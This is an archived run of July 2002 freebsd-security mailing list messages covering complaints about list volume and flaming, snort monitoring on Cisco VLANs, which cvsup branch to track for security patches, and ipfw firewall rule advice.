<200206301817.EAA05639@caligula.anu.edu.au> <20020701135719.GA65770@palomine.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org < said: > I don't care about the port. Personally, I'd rather it didn't exist, > and I think admins who install it need to have their head checked. I don't care about the base-install ssh. Personally, I'd rather it didn't exist, and I think admins who install it need to have their heads checked. So there! -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 12: 1:41 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2311A37B400 for ; Mon, 1 Jul 2002 12:01:38 -0700 (PDT) Received: from zim.sifl.net (zim.sifl.net [207.246.130.68]) by mx1.FreeBSD.org (Postfix) with ESMTP id C592443E09 for ; Mon, 1 Jul 2002 12:01:37 -0700 (PDT) (envelope-from jesse@206underground.net) Received: from VAIO (box46.westin33.flyingcroc.net [207.246.151.46]) by zim.sifl.net (8.12.3/8.12.3) with ESMTP id g61J1G7k057801; Mon, 1 Jul 2002 12:01:16 -0700 (PDT) (envelope-from jesse@206underground.net) From: "Jesse" To: "Garrett Wollman" Cc: Subject: RE: security risk: ktrace(2) in FreeBSD prior to -current. Date: Mon, 1 Jul 2002 12:01:33 -0700 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) In-reply-to: <200207011850.g61IolTT078907@khavrinen.lcs.mit.edu> X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Please, everyone, I use this list to track _important_ security issues dealing with both production and personal machines. Do you know what LOW VOLUME means? -----Original Message----- From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Garrett Wollman Sent: Monday, July 01, 2002 11:51 AM To: Dag-Erling Smorgrav Cc: security@FreeBSD.ORG Subject: Re: security risk: ktrace(2) in FreeBSD prior to -current. < said: > I don't care about the port. Personally, I'd rather it didn't exist, > and I think admins who install it need to have their head checked. I don't care about the base-install ssh. Personally, I'd rather it didn't exist, and I think admins who install it need to have their heads checked. So there! -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 12: 5:17 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 53C2E37B400 for ; Mon, 1 Jul 2002 12:05:14 -0700 (PDT) Received: from mail.gcfn.org (mail.gcfn.org [164.107.107.13]) by mx1.FreeBSD.org (Postfix) with ESMTP id 74B1543E09 for ; Mon, 1 Jul 2002 12:05:13 -0700 (PDT) (envelope-from kennsmit@gcfn.org) Received: from gcfn.org (ginsu [192.168.1.14]) by mail.gcfn.org (8.9.3/8.9.3) with SMTP id PAA04484; Mon, 1 Jul 2002 15:01:16 -0400 (EDT) From: Kenneth Smith Received: from 199.125.55.250 (SquirrelMail authenticated user kennsmit) by www.gcfn.org with HTTP; Mon, 1 Jul 2002 15:01:16 -0400 (EDT) Message-ID: <27779.199.125.55.250.1025550076.squirrel@www.gcfn.org> Date: Mon, 1 Jul 2002 15:01:16 -0400 (EDT) Subject: Re: snort + vlans To: dima@rt.ru In-Reply-To: <3D20904C.8AF8703C@rt.ru> References: <3D20904C.8AF8703C@rt.ru> Cc: security@FreeBSD.ORG X-Mailer: SquirrelMail (version 1.0.6) MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Dmitry: Have you looked at the IOS "port monitor" command? It is not clear what you are referring to when you say "my box," but I would be careful if you are using vlan's to seperate your unsecured and secured LAN's. ks > mike.jablonski@abnamrousa.com wrote: >> >> you need to enable the span port feature. >> > > Sorry, seems my explain was too bad. > I have internal FW. It is connected to cat2924 > with xl0 at 100Mbit. > Switch port is in trunk mode. > there is 2 vlans on xl0: vlan0 and vlan1. > There is no ip on xl0. > My defaultouter (cisco 26XX) is in vlan0 (trunk too). > My office subnet is on vlan1 (all office hosts > configured as vlan 1 on switch). > > So, my box works as router+FW between vlan0 and vlan1. > Now it works. > > So, I want to setup snort to detect attacks. > What iface (xl0, vlan0, or what) shall I bind snort > (snort -i flag) to make it analyze both internal > and external traffic? > > Another question is: cisco detects vlans with vtp > protocol. Does FreeBSD supports it? > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 12:20:53 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 13D0A37B4C4 for ; Mon, 1 Jul 2002 12:20:43 -0700 (PDT) Received: from ns3.ideathcare.com (mail.allneo.com [216.185.96.68]) by mx1.FreeBSD.org (Postfix) with SMTP id BE93D43E13 for ; Mon, 1 Jul 2002 12:20:41 -0700 (PDT) (envelope-from jps@funeralexchange.com) Received: (qmail 5699 invoked by uid 85); 1 Jul 2002 19:25:22 -0000 Received: from jps@funeralexchange.com by ns3.ideathcare.com with qmail-scanner-1.03 (uvscan: v4.1.40/v4121. . Clean. Processed in 0.172156 secs); 01 Jul 2002 19:25:22 -0000 Received: from unknown (HELO pimpin) (216.138.114.131) by mail.allneo.com with SMTP; 1 Jul 2002 19:25:22 -0000 Reply-To: From: "Jeremy Suo-Anttila" To: "Jesse" , "Garrett Wollman" Cc: Subject: RE: security risk: ktrace(2) in FreeBSD prior to -current. Date: Mon, 1 Jul 2002 14:27:00 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300 Importance: Normal In-Reply-To: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org There is no such thing as low volume with people like Brett Glass on here. I would love to have this list setup to ONLY send out notifications. I think that 90% of the mail i get from here is flame wars between Brett and someone who's toes he has stepped on again. Also Brett no hard feelings but i belive alot of your questions / concerns should be placed on -questions or -chat there really is no need for these never ending threads that we have all been seeing lately. There is so much flaming going on i swear i am going to miss a valid security posting since there is so much crap coming into my mailbox. I really do not care how YOU feel FreeBSD is setup or why a certain packages / ports have not been made to fit your NEEDS this is FreeBSD if you dont like the way its done stop bitching, moaning, crying and having a general hissy fit about it all and code the fixes yourself. NO ONE says you have to use FreeBSD so if you really do not like the way the updates and patch system works go use something else. Also i really do not care that you have a zillion machines running various types of FreeBSD and other embedded OS's. That is not our problem and if you are concerned about how you are going to protect and update them maybe you should have taken that into consideration when you purchased the equipment and you may have steered away from a embedded *blackbox* type devices. Did you ever stop to think that if you actually STFU for a couple of days maybe the developers could fix the problems and not have to deal with responding to your tired ass questions. Also please respond to me in CC since i do not wish to waste anyones bandwidth. Thanks Jps -----Original Message----- From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Jesse Sent: Monday, July 01, 2002 2:02 PM To: Garrett Wollman Cc: security@FreeBSD.ORG Subject: RE: security risk: ktrace(2) in FreeBSD prior to -current. Please, everyone, I use this list to track _important_ security issues dealing with both production and personal machines. Do you know what LOW VOLUME means? -----Original Message----- From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Garrett Wollman Sent: Monday, July 01, 2002 11:51 AM To: Dag-Erling Smorgrav Cc: security@FreeBSD.ORG Subject: Re: security risk: ktrace(2) in FreeBSD prior to -current. < said: > I don't care about the port. Personally, I'd rather it didn't exist, > and I think admins who install it need to have their head checked. I don't care about the base-install ssh. Personally, I'd rather it didn't exist, and I think admins who install it need to have their heads checked. So there! -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 12:25:53 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2338737B400 for ; Mon, 1 Jul 2002 12:25:51 -0700 (PDT) Received: from smtp018.mail.yahoo.com (smtp018.mail.yahoo.com [216.136.174.115]) by mx1.FreeBSD.org (Postfix) with SMTP id D82AF43E0A for ; Mon, 1 Jul 2002 12:25:50 -0700 (PDT) (envelope-from anthonyrubin@yahoo.com) Received: from w184.z064001133.chi-il.dsl.cnc.net (HELO yahoo.com) (anthonyrubin@64.1.133.184 with plain) by smtp.mail.vip.sc5.yahoo.com with SMTP; 1 Jul 2002 19:25:44 -0000 Message-ID: <3D20ACB6.5020106@yahoo.com> Date: Mon, 01 Jul 2002 14:25:42 -0500 From: Anthony Rubin User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US; rv:1.0.0) Gecko/20020529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: jps@funeralexchange.com Cc: Jesse , Garrett Wollman , security@FreeBSD.ORG Subject: Re: security risk: ktrace(2) in FreeBSD prior to -current. References: Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Jeremy, It sounds like you should subscribe to freebsd-security-notifications instead of freebsd-security. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 12:33: 0 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8B55B37B400 for ; Mon, 1 Jul 2002 12:32:58 -0700 (PDT) Received: from mail.gbronline.com (mail.gbronline.com [12.145.226.4]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8AB3F43E13 for ; Mon, 1 Jul 2002 12:32:57 -0700 (PDT) (envelope-from kdk@daleco.biz) Received: from daleco [12.145.236.237] by mail.gbronline.com (SMTPD32-7.10) id AE0911AE0246; Mon, 01 Jul 2002 14:31:21 -0500 Message-ID: <008401c22136$08d62e00$edec910c@fbccarthage.com> From: "Kevin Kinsey, DaleCo, S.P." To: "Ralph Huntington" , References: <20020701141839.V50179-100000@mohegan.mohawk.net> Subject: Re: security fixes Date: Mon, 1 Jul 2002 14:32:26 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org No one's tried on this yet, so I will. comments inline ----- Original Message ----- From: "Ralph Huntington" To: Sent: Monday, July 01, 2002 1:20 PM Subject: security fixes > With all the traffic surrounding these recent vulnerabilities, it's a > little confusing to know what one has to do and need not do. Let me ask > this one question, please: > > In cvsup'ing the patched sources, if I have a 4.6-RELEASE box, should I > cvsup RELENG_4_6 and for the earlier 4.x machines cvsup RELENG_4 ??? > The more I think about the question, the tricker it gets, so I think I begin to see your point. You'd have to look at what's been committed to see for sure. I don't think that you'd break anything by doing RELENG_4_6 even on your earlier boxes, though. After all, you're going to make buildworld anyway... If you cvsup the "earlier" machines to RELENG_4, they will actually be "more up to date" than the 4.6-RELEASE box you have now, not that I'm telling you something you don't already know, I guess. > Or should they all get RELENG_4 ? > If you want them all to run -STABLE, yes. Personally, -STABLE seems pretty -STABLE right now, for me, running mail, web, database, etc. They say "you may not wish to run -STABLE on production servers" so *caveat emptor*, I guess, but I have no probs with -STABLE built last week. > Thank you, Ralph > HTH, KDK To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 12:40:38 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 58BC737B400 for ; Mon, 1 Jul 2002 12:40:24 -0700 (PDT) Received: from web10106.mail.yahoo.com (web10106.mail.yahoo.com [216.136.130.56]) by mx1.FreeBSD.org (Postfix) with SMTP id 21AF943E26 for ; Mon, 1 Jul 2002 12:40:24 -0700 (PDT) (envelope-from twigles@yahoo.com) Message-ID: <20020701194023.12286.qmail@web10106.mail.yahoo.com> Received: from [68.5.49.41] by web10106.mail.yahoo.com via HTTP; Mon, 01 Jul 2002 12:40:23 PDT Date: Mon, 1 Jul 2002 12:40:23 -0700 (PDT) From: twig les Subject: Re: snort + vlans To: "Dmitry S. Rzhavin" , mike.jablonski@abnamrousa.com, security@FreeBSD.ORG In-Reply-To: <3D20904C.8AF8703C@rt.ru> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I don't like being the bearer of bad news, but the SPAN feature on the 2900 and 3500 series *sucks*. To answer your question about which interface to use, bind Snort to the interface that is inside the VLAN you want to monitor, because otherwise you won't see any traffic. The bigger Catalysts can monitor multiple VLANs but not the 29/35s. Another limitation of this series is the ability to only set one receive port. Again, the bigger switches don't have this. Also, read this fun fact from Cisco's site: "The monitoring port receives copies of transmitted and received traffic for all monitored ports. In this architecture, a packet destined for multiple destinations is stored in memory until all copies have been forwarded. If the monitoring port is 50 percent oversubscribed for a sustained period of time, it will probably become congested and hold part of the shared memory. One or more of the ports being monitored might then also experience a slowdown." http://www.cisco.com/warp/public/473/41.html#archXL This pretty much means that if your sniffer port is over 50% then it will drag other ports down. Cisco has a neat feature called port protection too. Well that breaks sniffing also. Sorry if this is kind of a rant. I have gone through many rites of passage on our Cisco switches (and lately the routers...). --- "Dmitry S. Rzhavin" wrote: > mike.jablonski@abnamrousa.com wrote: > > > > you need to enable the span port feature. > > > > Sorry, seems my explain was too bad. > I have internal FW. It is connected to cat2924 > with xl0 at 100Mbit. > Switch port is in trunk mode. > there is 2 vlans on xl0: vlan0 and vlan1. > There is no ip on xl0. > My defaultouter (cisco 26XX) is in vlan0 (trunk > too). > My office subnet is on vlan1 (all office hosts > configured as vlan 1 on switch). > > So, my box works as router+FW between vlan0 and > vlan1. > Now it works. > > So, I want to setup snort to detect attacks. > What iface (xl0, vlan0, or what) shall I bind snort > (snort -i flag) to make it analyze both internal > and external traffic? > > Another question is: cisco detects vlans with vtp > protocol. Does FreeBSD supports it? > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of > the message ===== ----------------------------------------------------------- Only fools have all the answers. ----------------------------------------------------------- __________________________________________________ Do You Yahoo!? Yahoo! - Official partner of 2002 FIFA World Cup http://fifaworldcup.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 12:41:58 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 62A8A37B400 for ; Mon, 1 Jul 2002 12:41:55 -0700 (PDT) Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id A4DF043E09 for ; Mon, 1 Jul 2002 12:41:54 -0700 (PDT) (envelope-from rjh@mohawk.net) Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by mohegan.mohawk.net (8.11.4/8.11.3) with ESMTP id g61Jfq246102; Mon, 1 Jul 2002 15:41:52 -0400 (EDT) Date: Mon, 1 Jul 2002 15:41:52 -0400 (EDT) From: Ralph Huntington To: "Kevin Kinsey, DaleCo, S.P." Cc: Subject: Re: security fixes In-Reply-To: <008401c22136$08d62e00$edec910c@fbccarthage.com> Message-ID: <20020701153650.Q50179-100000@mohegan.mohawk.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > > In cvsup'ing the patched sources, if I have a 4.6-RELEASE box, should I > > cvsup RELENG_4_6 and for the earlier 4.x machines cvsup RELENG_4 ??? > I don't think that you'd break anything by doing RELENG_4_6 even on > your earlier boxes, though. After all, you're going to make > buildworld anyway... Yes, I'll make buildworld. > If you cvsup the "earlier" machines to RELENG_4, they will actually > be "more up to date" than the 4.6-RELEASE box you have now, not > that I'm telling you something you don't already know, I guess. I thought that, but frankly wasn't sure. It seem counterintuitive, but that doesn't mean it's not the right way. > > Or should they all get RELENG_4 ? > If you want them all to run -STABLE, yes. Personally, -STABLE seems > pretty -STABLE right now, for me, running mail, web, database, etc. > They say "you may not wish to run -STABLE on production servers" so > *caveat emptor*, I guess, but I have no probs with -STABLE built last > week. Hmmm... I would think STABLE is what one sould want to run on a production machine. I'm beginning to feel confused again. Thanks for the reply, though. It did answer my question. I also received this in an email reply: "... you can cvsup RELENG_4_6 to get the security update ONLY and make world to install it, or you can use RELENG_4 to get the security fix AND new -STABLE code, then make world." That makes RELENG_4 seem like a bargain. Thanks again for the replies, Ralph To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 13: 7:36 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4630637B400 for ; Mon, 1 Jul 2002 13:07:32 -0700 (PDT) Received: from mail.gbronline.com (mail.gbronline.com [12.145.226.4]) by mx1.FreeBSD.org (Postfix) with ESMTP id 98C0743E09 for ; Mon, 1 Jul 2002 13:07:31 -0700 (PDT) (envelope-from kdk@daleco.biz) Received: from daleco [12.145.236.237] by mail.gbronline.com (SMTPD32-7.10) id A62363D9007E; Mon, 01 Jul 2002 15:05:55 -0500 Message-ID: <009201c2213a$dd3a4b00$edec910c@fbccarthage.com> From: "Kevin Kinsey, DaleCo, S.P." To: "Ralph Huntington" Cc: References: <20020701153650.Q50179-100000@mohegan.mohawk.net> Subject: Re: security fixes Date: Mon, 1 Jul 2002 15:07:01 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org ----- Original Message ----- From: "Ralph Huntington" To: "Kevin Kinsey, DaleCo, S.P." Cc: Sent: Monday, July 01, 2002 2:41 PM Subject: Re: security fixes >Hmmm... I would think STABLE is what one sould >want to run on a production >machine. I'm beginning to feel confused again. As opposed to -CURRENT, yes. However, the committers want everyone to realize that once in a while you might build -STABLE with something broken (albeit rare, as in the coincidence of the "blue moon" and "hen's teeth" together...) but it still could happen. -RELEASE is a -STABLE that gets frozen for a while to see if any problems pop up, or if it can be crowed about and burned to CD with confidence (I hope the RELENG team doesn't think I'm minimizing their hard work here.) Some people read the warning about -STABLE in the Handbook (that I quoted earlier) and decide only to run -RELEASE and patch security fixes, and there is a cvs tag for this, called RELENG_4_x. This is where a little confusion comes in, because after a while they quit patching the older releases. The official line is that it's the current release (4.6) and the last (4.5) that are being patched, so if you're still running 4.4-R, (for example) you're no longer sure you can cvsup with RELENG_4_4 and get any new patches. As I said, -STABLE's running fine for me right now and has everytime I've tried it. [If there's confusion on the term "production machine," I take this to mean an active www/mail/file server that you can't afford to have downtime on....] KDK To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 13:16:43 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6FC0037B400 for ; Mon, 1 Jul 2002 13:16:40 -0700 (PDT) Received: from mail.gmx.net (mail.gmx.net [213.165.64.20]) by mx1.FreeBSD.org (Postfix) with SMTP id 2985743E09 for ; Mon, 1 Jul 2002 13:16:39 -0700 (PDT) (envelope-from Gerhard.Sittig@gmx.net) Received: (qmail 17794 invoked by uid 0); 1 Jul 2002 20:16:37 -0000 Received: from p5091081e.dip0.t-ipconnect.de (HELO mail.gsinet.sittig.org) (80.145.8.30) by mail.gmx.net (mp004-rz3) with SMTP; 1 Jul 2002 20:16:37 -0000 Received: (qmail 39904 invoked from network); 1 Jul 2002 19:48:33 -0000 Received: from shell.gsinet.sittig.org (192.168.11.153) by mail.gsinet.sittig.org with SMTP; 1 Jul 2002 19:48:33 -0000 Received: (from sittig@localhost) by shell.gsinet.sittig.org (8.11.3/8.11.3) id g61JmPU39891 for security@freebsd.org; Mon, 1 Jul 2002 21:48:25 +0200 (CEST) (envelope-from sittig) Date: Mon, 1 Jul 2002 21:48:25 +0200 From: Gerhard Sittig To: security@freebsd.org Subject: Re: Making a firewall more closed Message-ID: <20020701214825.L1494@shell.gsinet.sittig.org> Mail-Followup-To: security@freebsd.org References: <01a001c22107$3d3b2850$0200a8c0@winxp> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <01a001c22107$3d3b2850$0200a8c0@winxp>; from nascar24@home.nl on Mon, Jul 01, 2002 at 03:57:23PM +0200 Organization: System Defenestrators Inc. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, Jul 01, 2002 at 15:57 +0200, nascar24 wrote: > > I've been using the IPFW for some time now but I have one problem. I have > closed my firewall (I guess) from attacks from the outside world. But I am > open to attacks from within, i.e: trojan horses etc. > > Here is my rc.firewall.rules file. I think it is in rule 500 & 550. But if I > change them to 21,22,80,8080 I cannot connect to any websites or FTP sites. > > [ filter rule set snipped ] > > I hope you can help, thanks in advance. What exactly is your question? If you want to "less trust the inside", close the inner interface as much as you did with the outside. If you are looking for hints on how to generally improve your filter rules I strongly suggest you have a look at the ipfilter HowTo -- even if you don't use ipf: this document talks about the basics, too, plus derives / designes a rule set from bottom up. Visit www.ipfilter.org or look at the misc/26763 PR (Cyrille Lefevre, "installing ipfilter sample files to share/examples"). virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76 Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net -- If you don't understand or are scared by any of the above ask your parents or an adult to help you. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 13:17: 2 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1AAAF37B400 for ; Mon, 1 Jul 2002 13:16:57 -0700 (PDT) Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 4D4BF43E09 for ; Mon, 1 Jul 2002 13:16:56 -0700 (PDT) (envelope-from rjh@mohawk.net) Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by mohegan.mohawk.net (8.11.4/8.11.3) with ESMTP id g61KGo254563; Mon, 1 Jul 2002 16:16:50 -0400 (EDT) Date: Mon, 1 Jul 2002 16:16:50 -0400 (EDT) From: Ralph Huntington To: "Kevin Kinsey, DaleCo, S.P." Cc: Subject: Re: security fixes In-Reply-To: <009201c2213a$dd3a4b00$edec910c@fbccarthage.com> Message-ID: <20020701161533.E50179-100000@mohegan.mohawk.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Well, that all makes enough sense. Yes, I know about production machines. Got quite a few of them to be responsible for. And always have run RELEASE but thought to ask for clarification about STABLE. Thanks to all who replied. - Ralph On Mon, 1 Jul 2002, Kevin Kinsey, DaleCo, S.P. wrote: > ----- Original Message ----- > From: "Ralph Huntington" > To: "Kevin Kinsey, DaleCo, S.P." > Cc: > Sent: Monday, July 01, 2002 2:41 PM > Subject: Re: security fixes > > >Hmmm... I would think STABLE is what one sould > >want to run on a production > >machine. I'm beginning to feel confused again. > > As opposed to -CURRENT, yes. However, > the committers want everyone to realize that > once in a while you might build -STABLE with > something broken (albeit rare, as in the coincidence > of the "blue moon" and "hen's teeth" together...) > but it still could happen. -RELEASE is a -STABLE > that gets frozen for a while to see if any problems > pop up, or if it can be crowed about and burned > to CD with confidence (I hope the RELENG team > doesn't think I'm minimizing their hard work here.) > > Some people read the warning about -STABLE in > the Handbook (that I quoted earlier) and decide only > to run -RELEASE and patch security fixes, and > there is a cvs tag for this, called RELENG_4_x. > This is where a little confusion comes in, because > after a while they quit patching the older releases. > The official line is that it's the current release (4.6) > and the last (4.5) that are being patched, so if > you're still running 4.4-R, (for example) you're no > longer sure you can cvsup with RELENG_4_4 > and get any new patches. > > As I said, -STABLE's running fine for me > right now and has everytime I've tried it. > > [If there's confusion on the term "production > machine," I take this to mean an active > www/mail/file server that you can't afford > to have downtime on....] > > KDK > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 13:25:58 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E4C5237B400 for ; Mon, 1 Jul 2002 13:25:55 -0700 (PDT) Received: from vec.nogood.org (CPE00045a0a55e6.cpe.net.cable.rogers.com [24.101.6.138]) by mx1.FreeBSD.org (Postfix) with ESMTP id CC4E443E0A for ; Mon, 1 Jul 2002 13:25:53 -0700 (PDT) (envelope-from getsubmail@nogood.org) Received: from cport (cport.local [192.168.1.120]) by vec.nogood.org (8.12.5/8.12.5) with SMTP id g61KMc9V080708; Mon, 1 Jul 2002 16:22:38 -0400 (EDT) (envelope-from getsubmail@nogood.org) From: "getsubmail" To: "Eric Anderson" Cc: Subject: RE: SSH Patches Date: Mon, 1 Jul 2002 16:23:10 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) In-Reply-To: <3D20A014.5B44DA36@centtech.com> X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > Lupe Christoph wrote: > > > > > > No default install without a remote root in over 20 years. > > > > > I think you're wrong here. They didn't have a networking stack before > > > Windows 3.11 for Workgroups, in the early 1990s, so it's more like ten > > > years. > > > > So it's no remote in a default install for the first ten years? > > Wo! Read it again: > No default install without a remote root in over 20 years. > should be: > No default install without a remote root in over 10 years. > > The other way would be very wrong (remember, we are talking about > the big evil > here). That is it's no remote (capability) in a default install for the first ten years? C.N. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 13:34:37 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9BAF437B400 for ; Mon, 1 Jul 2002 13:34:31 -0700 (PDT) 